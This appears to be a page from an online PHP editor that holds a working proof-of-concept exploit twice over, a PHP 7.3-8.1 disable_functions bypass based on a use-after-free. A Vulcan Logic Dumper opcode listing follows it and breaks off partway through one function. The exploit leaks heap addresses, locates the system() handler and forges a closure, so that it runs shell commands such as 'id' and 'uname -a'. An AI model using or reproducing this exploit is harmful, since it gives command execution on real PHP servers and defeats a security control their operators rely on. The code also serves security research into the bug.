Online PHP editor | vld for BSo5H

<?php new Pwn("id"); class Helper { public $a, $b, $c; } class Pwn { const LOGGING = false; const CHUNK_DATA_SIZE = 0x60; const CHUNK_SIZE = ZEND_DEBUG_BUILD ? self::CHUNK_DATA_SIZE + 0x20 : self::CHUNK_DATA_SIZE; const STRING_SIZE = self::CHUNK_DATA_SIZE - 0x18 - 1; const HT_SIZE = 0x118; const HT_STRING_SIZE = self::HT_SIZE - 0x18 - 1; public function __construct($cmd) { for($i = 0; $i < 10; $i++) { $groom[] = self::alloc(self::STRING_SIZE); $groom[] = self::alloc(self::HT_STRING_SIZE); } $concat_str_addr = self::str2ptr($this->heap_leak(), 16); $fill = self::alloc(self::STRING_SIZE); $this->abc = self::alloc(self::STRING_SIZE); $abc_addr = $concat_str_addr + self::CHUNK_SIZE; self::log("abc @ 0x%x", $abc_addr); $this->free($abc_addr); $this->helper = new Helper; if(strlen($this->abc) < 0x1337) { self::log("uaf failed"); return; } $this->helper->a = "leet"; $this->helper->b = function($x) {}; $this->helper->c = 0xfeedface; $helper_handlers = $this->rel_read(0); self::log("helper handlers @ 0x%x", $helper_handlers); $closure_addr = $this->rel_read(0x20); self::log("real closure @ 0x%x", $closure_addr); $closure_ce = $this->read($closure_addr + 0x10); self::log("closure class_entry @ 0x%x", $closure_ce); $basic_funcs = $this->get_basic_funcs($closure_ce); self::log("basic_functions @ 0x%x", $basic_funcs); $zif_system = $this->get_system($basic_funcs); self::log("zif_system @ 0x%x", $zif_system); $fake_closure_off = 0x70; for($i = 0; $i < 0x138; $i += 8) { $this->rel_write($fake_closure_off + $i, $this->read($closure_addr + $i)); } $this->rel_write($fake_closure_off + 0x38, 1, 4); $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68; $this->rel_write($fake_closure_off + $handler_offset, $zif_system); $fake_closure_addr = $abc_addr + $fake_closure_off + 0x18; self::log("fake closure @ 0x%x", $fake_closure_addr); $this->rel_write(0x20, $fake_closure_addr); ($this->helper->b)($cmd); $this->rel_write(0x20, $closure_addr); unset($this->helper->b); } private function heap_leak() { $arr = [[], []]; set_error_handler(function() use (&$arr, &$buf) { $arr = 1; $buf = str_repeat("\x00", self::HT_STRING_SIZE); }); $arr[1] .= self::alloc(self::STRING_SIZE - strlen("Array")); return $buf; } private function free($addr) { $payload = pack("Q*", 0xdeadbeef, 0xcafebabe, $addr); $payload .= str_repeat("A", self::HT_STRING_SIZE - strlen($payload)); $arr = [[], []]; set_error_handler(function() use (&$arr, &$buf, &$payload) { $arr = 1; $buf = str_repeat($payload, 1); }); $arr[1] .= "x"; } private function rel_read($offset) { return self::str2ptr($this->abc, $offset); } private function rel_write($offset, $value, $n = 8) { for ($i = 0; $i < $n; $i++) { $this->abc[$offset + $i] = chr($value & 0xff); $value >>= 8; } } private function read($addr, $n = 8) { $this->rel_write(0x10, $addr - 0x10); $value = strlen($this->helper->a); if($n !== 8) { $value &= (1 << ($n << 3)) - 1; } return $value; } private function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = $this->read($addr); $f_name = $this->read($f_entry, 6); if($f_name === 0x6d6574737973) { return $this->read($addr + 8); } $addr += 0x20; } while($f_entry !== 0); } private function get_basic_funcs($addr) { while(true) { // In rare instances the standard module might lie after the addr we're starting // the search from. This will result in a SIGSGV when the search reaches an unmapped page. // In that case, changing the direction of the search should fix the crash. // $addr += 0x10; $addr -= 0x10; if($this->read($addr, 4) === 0xA8 && in_array($this->read($addr + 4, 4), [20180731, 20190902, 20200930, 20210902])) { $module_name_addr = $this->read($addr + 0x20); $module_name = $this->read($module_name_addr); if($module_name === 0x647261646e617473) { self::log("standard module @ 0x%x", $addr); return $this->read($addr + 0x28); } } } } private function log($format, $val = "") { if(self::LOGGING) { printf("{$format}\n", $val); } } static function alloc($size) { return str_shuffle(str_repeat("A", $size)); } static function str2ptr($str, $p = 0, $n = 8) { $address = 0; for($j = $n - 1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p + $j]); } return $address; } } ?><?php # PHP 7.3-8.1 disable_functions bypass PoC (*nix only) # # Bug: https://bugs.php.net/bug.php?id=81705 # # This exploit should work on all PHP 7.3-8.1 versions # released as of 2022-01-07 # # Author: https://github.com/mm0r1 new Pwn("uname -a"); class Helper { public $a, $b, $c; } class Pwn { const LOGGING = false; const CHUNK_DATA_SIZE = 0x60; const CHUNK_SIZE = ZEND_DEBUG_BUILD ? self::CHUNK_DATA_SIZE + 0x20 : self::CHUNK_DATA_SIZE; const STRING_SIZE = self::CHUNK_DATA_SIZE - 0x18 - 1; const HT_SIZE = 0x118; const HT_STRING_SIZE = self::HT_SIZE - 0x18 - 1; public function __construct($cmd) { for($i = 0; $i < 10; $i++) { $groom[] = self::alloc(self::STRING_SIZE); $groom[] = self::alloc(self::HT_STRING_SIZE); } $concat_str_addr = self::str2ptr($this->heap_leak(), 16); $fill = self::alloc(self::STRING_SIZE); $this->abc = self::alloc(self::STRING_SIZE); $abc_addr = $concat_str_addr + self::CHUNK_SIZE; self::log("abc @ 0x%x", $abc_addr); $this->free($abc_addr); $this->helper = new Helper; if(strlen($this->abc) < 0x1337) { self::log("uaf failed"); return; } $this->helper->a = "leet"; $this->helper->b = function($x) {}; $this->helper->c = 0xfeedface; $helper_handlers = $this->rel_read(0); self::log("helper handlers @ 0x%x", $helper_handlers); $closure_addr = $this->rel_read(0x20); self::log("real closure @ 0x%x", $closure_addr); $closure_ce = $this->read($closure_addr + 0x10); self::log("closure class_entry @ 0x%x", $closure_ce); $basic_funcs = $this->get_basic_funcs($closure_ce); self::log("basic_functions @ 0x%x", $basic_funcs); $zif_system = $this->get_system($basic_funcs); self::log("zif_system @ 0x%x", $zif_system); $fake_closure_off = 0x70; for($i = 0; $i < 0x138; $i += 8) { $this->rel_write($fake_closure_off + $i, $this->read($closure_addr + $i)); } $this->rel_write($fake_closure_off + 0x38, 1, 4); $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68; $this->rel_write($fake_closure_off + $handler_offset, $zif_system); $fake_closure_addr = $abc_addr + $fake_closure_off + 0x18; self::log("fake closure @ 0x%x", $fake_closure_addr); $this->rel_write(0x20, $fake_closure_addr); ($this->helper->b)($cmd); $this->rel_write(0x20, $closure_addr); unset($this->helper->b); } private function heap_leak() { $arr = [[], []]; set_error_handler(function() use (&$arr, &$buf) { $arr = 1; $buf = str_repeat("\x00", self::HT_STRING_SIZE); }); $arr[1] .= self::alloc(self::STRING_SIZE - strlen("Array")); return $buf; } private function free($addr) { $payload = pack("Q*", 0xdeadbeef, 0xcafebabe, $addr); $payload .= str_repeat("A", self::HT_STRING_SIZE - strlen($payload)); $arr = [[], []]; set_error_handler(function() use (&$arr, &$buf, &$payload) { $arr = 1; $buf = str_repeat($payload, 1); }); $arr[1] .= "x"; } private function rel_read($offset) { return self::str2ptr($this->abc, $offset); } private function rel_write($offset, $value, $n = 8) { for ($i = 0; $i < $n; $i++) { $this->abc[$offset + $i] = chr($value & 0xff); $value >>= 8; } } private function read($addr, $n = 8) { $this->rel_write(0x10, $addr - 0x10); $value = strlen($this->helper->a); if($n !== 8) { $value &= (1 << ($n << 3)) - 1; } return $value; } private function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = $this->read($addr); $f_name = $this->read($f_entry, 6); if($f_name === 0x6d6574737973) { return $this->read($addr + 8); } $addr += 0x20; } while($f_entry !== 0); } private function get_basic_funcs($addr) { while(true) { // In rare instances the standard module might lie after the addr we're starting // the search from. This will result in a SIGSGV when the search reaches an unmapped page. // In that case, changing the direction of the search should fix the crash. // $addr += 0x10; $addr -= 0x10; if($this->read($addr, 4) === 0xA8 && in_array($this->read($addr + 4, 4), [20180731, 20190902, 20200930, 20210902])) { $module_name_addr = $this->read($addr + 0x20); $module_name = $this->read($module_name_addr); if($module_name === 0x647261646e617473) { self::log("standard module @ 0x%x", $addr); return $this->read($addr + 0x28); } } } } private function log($format, $val = "") { if(self::LOGGING) { printf("{$format}\n", $val); } } static function alloc($size) { return str_shuffle(str_repeat("A", $size)); } static function str2ptr($str, $p = 0, $n = 8) { $address = 0; for($j = $n - 1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p + $j]); } return $address; } } ?>

Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/BSo5H
function name:  (null)
number of ops:  11
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   NEW                                              $0      'Pwn'
          1        SEND_VAL_EX                                              'id'
          2        DO_FCALL                                      0          
          3        FREE                                                     $0
  174     4        NEW                                              $2      'Pwn'
          5        SEND_VAL_EX                                              'uname+-a'
          6        DO_FCALL                                      0          
          7        FREE                                                     $2
  176     8        DECLARE_CLASS                                            'helper'
  177     9        DECLARE_CLASS                                            'pwn'
  335    10      > RETURN                                                   1

Class Helper: [no user functions]
Class Pwn:
Function __construct:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 14
Branch analysis from position: 14
2 jumps found. (Code = 44) Position 1 = 16, Position 2 = 3
Branch analysis from position: 16
2 jumps found. (Code = 43) Position 1 = 49, Position 2 = 53
Branch analysis from position: 49
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 53
1 jumps found. (Code = 42) Position 1 = 117
Branch analysis from position: 117
2 jumps found. (Code = 44) Position 1 = 119, Position 2 = 107
Branch analysis from position: 119
2 jumps found. (Code = 43) Position 1 = 126, Position 2 = 128
Branch analysis from position: 126
1 jumps found. (Code = 42) Position 1 = 129
Branch analysis from position: 129
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 128
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 107
2 jumps found. (Code = 44) Position 1 = 119, Position 2 = 107
Branch analysis from position: 119
Branch analysis from position: 107
Branch analysis from position: 3
2 jumps found. (Code = 44) Position 1 = 16, Position 2 = 3
Branch analysis from position: 16
Branch analysis from position: 3
filename:       /in/BSo5H
function name:  __construct
number of ops:  158
compiled vars:  !0 = $cmd, !1 = $i, !2 = $groom, !3 = $concat_str_addr, !4 = $fill, !5 = $abc_addr, !6 = $helper_handlers, !7 = $closure_addr, !8 = $closure_ce, !9 = $basic_funcs, !10 = $zif_system, !11 = $fake_closure_off, !12 = $handler_offset, !13 = $fake_closure_addr
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   14     0  E >   RECV                                             !0      
   15     1        ASSIGN                                                   !1, 0
          2      > JMP                                                      ->14
   16     3    >   INIT_STATIC_METHOD_CALL                                  'alloc'
          4        SEND_VAL_EX                                              71
          5        DO_FCALL                                      0  $16     
          6        ASSIGN_DIM                                               !2
          7        OP_DATA                                                  $16
   17     8        INIT_STATIC_METHOD_CALL                                  'alloc'
          9        SEND_VAL_EX                                              255
         10        DO_FCALL                                      0  $18     
         11        ASSIGN_DIM                                               !2
         12        OP_DATA                                                  $18
   15    13        PRE_INC                                                  !1
         14    >   IS_SMALLER                                               !1, 10
         15      > JMPNZ                                                    ~20, ->3
   20    16    >   INIT_STATIC_METHOD_CALL                                  'str2ptr'
         17        INIT_METHOD_CALL                                         'heap_leak'
         18        DO_FCALL                                      0  $21     
         19        SEND_VAR_NO_REF_EX                                       $21
         20        SEND_VAL_EX                                              16
         21        DO_FCALL                                      0  $22     
         22        ASSIGN                                                   !3, $22
   21    23        INIT_STATIC_METHOD_CALL                                  'alloc'
         24        SEND_VAL_EX                                              71
         25        DO_FCALL                                      0  $24     
         26        ASSIGN                                                   !4, $24
   23    27        INIT_STATIC_METHOD_CALL                                  'alloc'
         28        SEND_VAL_EX                                              71
         29        DO_FCALL                                      0  $27     
         30        ASSIGN_OBJ                                               'abc'
         31        OP_DATA                                                  $27
   24    32        ADD                                              ~28     !3, 96
         33        ASSIGN                                                   !5, ~28
   25    34        INIT_STATIC_METHOD_CALL                                  'log'
         35        SEND_VAL_EX                                              'abc+%40+0x%25x'
         36        SEND_VAR_EX                                              !5
         37        DO_FCALL                                      0          
   27    38        INIT_METHOD_CALL                                         'free'
         39        SEND_VAR_EX                                              !5
         40        DO_FCALL                                      0          
   28    41        NEW                                              $33     'Helper'
         42        DO_FCALL                                      0          
         43        ASSIGN_OBJ                                               'helper'
         44        OP_DATA                                                  $33
   29    45        FETCH_OBJ_R                                      ~35     'abc'
         46        STRLEN                                           ~36     ~35
         47        IS_SMALLER                                               ~36, 4919
         48      > JMPZ                                                     ~37, ->53
   30    49    >   INIT_STATIC_METHOD_CALL                                  'log'
         50        SEND_VAL_EX                                              'uaf+failed'
         51        DO_FCALL                                      0          
   31    52      > RETURN                                                   null
   34    53    >   FETCH_OBJ_W                                      $39     'helper'
         54        ASSIGN_OBJ                                               $39, 'a'
         55        OP_DATA                                                  'leet'
   35    56        DECLARE_LAMBDA_FUNCTION                          ~43     [0]
         57        FETCH_OBJ_W                                      $41     'helper'
         58        ASSIGN_OBJ                                               $41, 'b'
         59        OP_DATA                                                  ~43
   36    60        FETCH_OBJ_W                                      $44     'helper'
         61        ASSIGN_OBJ                                               $44, 'c'
         62        OP_DATA                                                  4277009102
   38    63        INIT_METHOD_CALL                                         'rel_read'
         64        SEND_VAL_EX                                              0
         65        DO_FCALL                                      0  $46     
         66        ASSIGN                                                   !6, $46
   39    67        INIT_STATIC_METHOD_CALL                                  'log'
         68        SEND_VAL_EX                                              'helper+handlers+%40+0x%25x'
         69        SEND_VAR_EX                                              !6
         70        DO_FCALL                                      0          
   41    71        INIT_METHOD_CALL                                         'rel_read'
         72        SEND_VAL_EX                                              32
         73        DO_FCALL                                      0  $49     
         74        ASSIGN                                                   !7, $49
   42    75        INIT_STATIC_METHOD_CALL                                  'log'
         76        SEND_VAL_EX                                              'real+closure+%40+0x%25x'
         77        SEND_VAR_EX                                              !7
         78        DO_FCALL                                      0          
   44    79        INIT_METHOD_CALL                                         'read'
         80        ADD                                              ~52     !7, 16
         81        SEND_VAL_EX                                              ~52
         82        DO_FCALL                                      0  $53     
         83        ASSIGN                                                   !8, $53
   45    84        INIT_STATIC_METHOD_CALL                                  'log'
         85        SEND_VAL_EX                                              'closure+class_entry+%40+0x%25x'
         86        SEND_VAR_EX                                              !8
         87        DO_FCALL                                      0          
   47    88        INIT_METHOD_CALL                                         'get_basic_funcs'
         89        SEND_VAR_EX                                              !8
         90        DO_FCALL                                      0  $56     
         91        ASSIGN                                                   !9, $56
   48    92        INIT_STATIC_METHOD_CALL                                  'log'
         93        SEND_VAL_EX                                              'basic_functions+%40+0x%25x'
         94        SEND_VAR_EX                                              !9
         95        DO_FCALL                                      0          
   50    96        INIT_METHOD_CALL                                         'get_system'
         97        SEND_VAR_EX                                              !9
         98        DO_FCALL                                      0  $59     
         99        ASSIGN                                                   !10, $59
   51   100        INIT_STATIC_METHOD_CALL                                  'log'
        101        SEND_VAL_EX                                              'zif_system+%40+0x%25x'
        102        SEND_VAR_EX                                              !10
        103        DO_FCALL                                      0          
   53   104        ASSIGN                                                   !11, 112
   54   105        ASSIGN                                                   !1, 0
        106      > JMP                                                      ->117
   55   107    >   INIT_METHOD_CALL                                         'rel_write'
        108        ADD                                              ~64     !11, !1
        109        SEND_VAL_EX                                              ~64
        110        INIT_METHOD_CALL                                         'read'
        111        ADD                                              ~65     !7, !1
        112        SEND_VAL_EX                                              ~65
        113        DO_FCALL                                      0  $66     
        114        SEND_VAR_NO_REF_EX                                       $66
        115        DO_FCALL                                      0          
   54   116        ASSIGN_OP                                     1          !1, 8
        117    >   IS_SMALLER                                               !1, 312
        118      > JMPNZ                                                    ~69, ->107
   57   119    >   INIT_METHOD_CALL                                         'rel_write'
        120        ADD                                              ~70     !11, 56
        121        SEND_VAL_EX                                              ~70
        122        SEND_VAL_EX                                              1
        123        SEND_VAL_EX                                              4
        124        DO_FCALL                                      0          
   58   125      > JMPZ                                                     <true>, ->128
        126    >   QM_ASSIGN                                        ~72     112
        127      > JMP                                                      ->129
        128    >   QM_ASSIGN                                        ~72     104
        129    >   ASSIGN                                                   !12, ~72
   59   130        INIT_METHOD_CALL                                         'rel_write'
        131        ADD                                              ~74     !11, !12
        132        SEND_VAL_EX                                              ~74
        133        SEND_VAR_EX                                              !10
        134        DO_FCALL                                      0          
   61   135        ADD                                              ~76     !5, !11
        136        ADD                                              ~77     ~76, 24
        137        ASSIGN                                                   !13, ~77
   62   138        INIT_STATIC_METHOD_CALL                                  'log'
        139        SEND_VAL_EX                                              'fake+closure+%40+0x%25x'
        140        SEND_VAR_EX                                              !13
        141        DO_FCALL                                      0          
   64   142        INIT_METHOD_CALL                                         'rel_write'
        143        SEND_VAL_EX                                              32
        144        SEND_VAR_EX                                              !13
        145        DO_FCALL                                      0          
   65   146        FETCH_OBJ_R                                      ~81     'helper'
        147        FETCH_OBJ_R                                      ~82     ~81, 'b'
        148        INIT_DYNAMIC_CALL                                        ~82
        149        SEND_VAR_EX                                              !0
        150        DO_FCALL                                      0          
   67   151        INIT_METHOD_CALL                                         'rel_write'
        152        SEND_VAL_EX                                              32
        153        SEND_VAR_EX                                              !7
        154        DO_FCALL                                      0          
   68   155        FETCH_OBJ_UNSET                                  $85     'helper'
        156        UNSET_OBJ                                                $85, 'b'
   69   157      > RETURN                                                   null


Dynamic Functions:
Dynamic Function 0
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/BSo5H
function name:  {closure}
number of ops:  2
compiled vars:  !0 = $x
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   35     0  E >   RECV                                             !0      
          1      > RETURN                                                   null

End of Dynamic Function 0

End of function __construct

Function heap_leak:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/BSo5H
function name:  heap_leak
number of ops:  14
compiled vars:  !0 = $arr, !1 = $buf
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   72     0  E >   ASSIGN                                                   !0, <array>
   73     1        INIT_FCALL                                               'set_error_handler'
          2        DECLARE_LAMBDA_FUNCTION                          ~3      [0]
          3        BIND_LEXICAL                                             ~3, !0
          4        BIND_LEXICAL                                             ~3, !1
   76     5        SEND_VAL                                                 ~3
   73     6        DO_ICALL                                                 
   77     7        INIT_STATIC_METHOD_CALL                                  'alloc'
          8        SEND_VAL_EX                                              66
          9        DO_FCALL                                      0  $6      
         10        ASSIGN_DIM_OP                .=               8          !0, 1
         11        OP_DATA                                                  $6
   78    12      > RETURN                                                   !1
   79    13*     > RETURN                                                   null


Dynamic Functions:
Dynamic Function 0
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/BSo5H
function name:  {closure}
number of ops:  10
compiled vars:  !0 = $arr, !1 = $buf
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   73     0  E >   BIND_STATIC                                              !0
          1        BIND_STATIC                                              !1
   74     2        ASSIGN                                                   !0, 1
   75     3        INIT_FCALL                                               'str_repeat'
          4        SEND_VAL                                                 '%00'
          5        FETCH_CLASS_CONSTANT                             ~3      'HT_STRING_SIZE'
          6        SEND_VAL                                                 ~3
          7        DO_ICALL                                         $4      
          8        ASSIGN                                                   !1, $4
   76     9      > RETURN                                                   null

End of Dynamic Function 0

End of function heap_leak

Function free:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/BSo5H
function name:  free
number of ops:  26
compiled vars:  !0 = $addr, !1 = $payload, !2 = $arr, !3 = $buf
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   81     0  E >   RECV                                             !0      
   82     1        INIT_FCALL                                               'pack'
          2        SEND_VAL                                                 'Q%2A'
          3        SEND_VAL                                                 3735928559
          4        SEND_VAL                                                 3405691582
          5        SEND_VAR                                                 !0
          6        DO_ICALL                                         $4      
          7        ASSIGN                                                   !1, $4
   83     8        INIT_FCALL                                               'str_repeat'
          9        SEND_VAL                                                 'A'
         10        STRLEN                                           ~6      !1
         11        SUB                                              ~7      255, ~6
         12        SEND_VAL                                                 ~7
         13        DO_ICALL                                         $8      
         14        ASSIGN_OP                                     8          !1, $8
   85    15        ASSIGN                                                   !2, <array>
   86    16        INIT_FCALL                                               'set_error_handler'
         17        DECLARE_LAMBDA_FUNCTION                          ~11     [0]
         18        BIND_LEXICAL                                             ~11, !2
         19        BIND_LEXICAL                                             ~11, !3
         20        BIND_LEXICAL                                             ~11, !1
   89    21        SEND_VAL                                                 ~11
   86    22        DO_ICALL                                                 
   90    23        ASSIGN_DIM_OP                .=               8          !2, 1
         24        OP_DATA                                                  'x'
   91    25      > RETURN                                                   null


Dynamic Functions:
Dynamic Function 0
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/BSo5H
function name:  {closure}
number of ops:  10
compiled vars:  !0 = $arr, !1 = $buf, !2 = $payload
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   86     0  E >   BIND_STATIC                                              !0
          1        BIND_STATIC                                              !1
          2        BIND_STATIC                                              !2
   87     3        ASSIGN                                                   !0, 1
   88     4        INIT_FCALL                                               'str_repeat'
          5        SEND_VAR                                                 !2
          6        SEND_VAL                                                 1
          7        DO_ICALL                                         $4      
          8        ASSIGN                                                   !1, $4
   89     9      > RETURN                                                   null

End of Dynamic Function 0

End of function free

Function rel_read:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/BSo5H
function name:  rel_read
number of ops:  9
compiled vars:  !0 = $offset
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   93     0  E >   RECV                                             !0      
   94     1        INIT_STATIC_METHOD_CALL                                  'str2ptr'
          2        CHECK_FUNC_ARG                                           
          3        FETCH_OBJ_FUNC_ARG                               $1      'abc'
          4        SEND_FUNC_ARG                                            $1
          5        SEND_VAR_EX                                              !0
          6        DO_FCALL                                      0  $2      
          7      > RETURN                                                   $2
   95     8*     > RETURN                                                   null

End of function rel_read

Function rel_write:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 15
Branch analysis from position: 15
2 jumps found. (Code = 44) Position 1 = 17, Position 2 = 5
Branch analysis from position: 17
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 5
2 jumps found. (Code = 44) Position 1 = 17, Position 2 = 5
Branch analysis from position: 17
Branch analysis from position: 5
filename:       /in/BSo5H
function name:  rel_write
number of ops:  18
compiled vars:  !0 = $offset, !1 = $value, !2 = $n, !3 = $i
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   97     0  E >   RECV                                             !0      
          1        RECV                                             !1      
          2        RECV_INIT                                        !2      8
   98     3        ASSIGN                                                   !3, 0
          4      > JMP                                                      ->15
   99     5    >   ADD                                              ~6      !0, !3
          6        INIT_FCALL                                               'chr'
          7        BW_AND                                           ~8      !1, 255
          8        SEND_VAL                                                 ~8
          9        DO_ICALL                                         $9      
         10        FETCH_OBJ_W                                      $5      'abc'
         11        ASSIGN_DIM                                               $5, ~6
         12        OP_DATA                                                  $9
  100    13        ASSIGN_OP                                     7          !1, 8
   98    14        PRE_INC                                                  !3
         15    >   IS_SMALLER                                               !3, !2
         16      > JMPNZ                                                    ~12, ->5
  102    17    > > RETURN                                                   null

End of function rel_write

Function read:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 13, Position 2 = 17
Branch analysis from position: 13
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 17
filename:       /in/BSo5H
function name:  read
number of ops:  19
compiled vars:  !0 = $addr, !1 = $n, !2 = $value
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
  104     0  E >   RECV                                             !0      
          1        RECV_INIT                                        !1      8
  105     2        INIT_METHOD_CALL                                         'rel_write'
          3        SEND_VAL                                                 16
          4        SUB                                              ~3      !0, 16
          5        SEND_VAL                                                 ~3
          6        DO_FCALL                                      0          
  106     7        FETCH_OBJ_R                                      ~5      'helper'
          8        FETCH_OBJ_R                                      ~6      ~5, 'a'
          9        STRLEN                                           ~7      ~6
         10        ASSIGN                                                   !2, ~7
  107    11        IS_NOT_IDENTICAL                                         !1, 8
         12      > JMPZ                                                     ~9, ->17
         13    >   SL                                               ~10     !1, 3
         14        SL                                               ~11     1, ~10
         15        SUB                                              ~12     ~11, 1
         16        ASSIGN_OP                                    10          !2, ~12
  108    17    > > RETURN                                                   !2
  109    18*     > RETURN                                                   null

End of function read

Function get_system:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 13, Position 2 = 18
Branch analysis from position: 13
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 18
2 jumps found. (Code = 44) Position 1 = 21, Position 2 = 2
Branch analysis from position: 21
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 2
filename:       /in/BSo5H
function name:  get_system
number of ops:  22
compiled vars:  !0 = $basic_funcs, !1 = $addr, !2 = $f_entry, !3 = $f_name
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
  111     0  E >   RECV                                             !0      
  112     1        ASSIGN                                                   !1, !0
  114     2    >   INIT_METHOD_CALL                                         'read'
          3        SEND_VAR                                                 !1
          4        DO_FCALL                                      0  $5      
          5        ASSIGN                                                   !2, $5
  115     6        INIT_METHOD_CALL                                         'read'
          7        SEND_VAR                                                 !2
          8        SEND_VAL                                                 6
          9        DO_FCALL                                      0  $7      
         10        ASSIGN                                                   !3, $7
  116    11        IS_IDENTICAL                                             !3, 120282512849267
         12      > JMPZ                                                     ~9, ->18
  117    13    >   INIT_METHOD_CALL                                         'read'
         14        ADD                                              ~10     !1, 8
         15        SEND_VAL                                                 ~10
         16        DO_FCALL                                      0  $11     
         17      > RETURN                                                   $11
  119    18    >   ASSIGN_OP                                     1          !1, 32
  120    19        IS_NOT_IDENTICAL                                         !2, 0
         20      > JMPNZ                                                    ~13, ->2
  121    21    > > RETURN                                                   null

End of function get_system

Function get_basic_funcs:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 40
Branch analysis from position: 40
2 jumps found. (Code = 44) Position 1 = 41, Position 2 = 2
Branch analysis from position: 41
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 2
2 jumps found. (Code = 46) Position 1 = 9, Position 2 = 19
Branch analysis from position: 9
2 jumps found. (Code = 43) Position 1 = 20, Position 2 = 40
Branch analysis from position: 20
2 jumps found. (Code = 43) Position 1 = 31, Position 2 = 40
Branch analysis from position: 31
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 40
Branch analysis from position: 40
Branch analysis from position: 19
filename:       /in/BSo5H
function name:  get_basic_funcs
number of ops:  42
compiled vars:  !0 = $addr, !1 = $module_name_addr, !2 = $module_name
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
  123     0  E >   RECV                                             !0      
  124     1      > JMP                                                      ->40
  129     2    >   ASSIGN_OP                                     2          !0, 16
  130     3        INIT_METHOD_CALL                                         'read'
          4        SEND_VAR

Generated using Vulcan Logic Dumper, using php 8.0.0